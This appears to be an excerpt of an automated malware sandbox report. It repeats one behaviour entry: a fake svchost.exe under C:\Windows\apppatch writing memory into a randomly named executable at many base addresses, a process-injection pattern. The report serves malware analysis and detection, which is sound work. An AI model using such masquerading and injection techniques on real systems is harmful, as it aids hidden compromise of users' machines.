Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1032000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2EF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2B42000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2AB2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2B02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 24F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2542000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2E82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 25F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2642000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2670000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2671000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 2672000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 26C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1550000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1551000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1552000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: CD2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: D22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1540000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1541000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1542000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1070000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1071000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1072000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1470000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1471000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1472000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 14C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 9B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: A02000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 652000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1032000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 940000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 941000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 942000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 992000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: F72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: FC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1570000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1571000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1572000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 15C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 10E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1132000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1220000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1221000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1222000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1272000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1250000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1251000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1252000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 12A2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 11B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1202000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: AC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: B12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1400000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1401000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe base: 1402000Jump to behavior
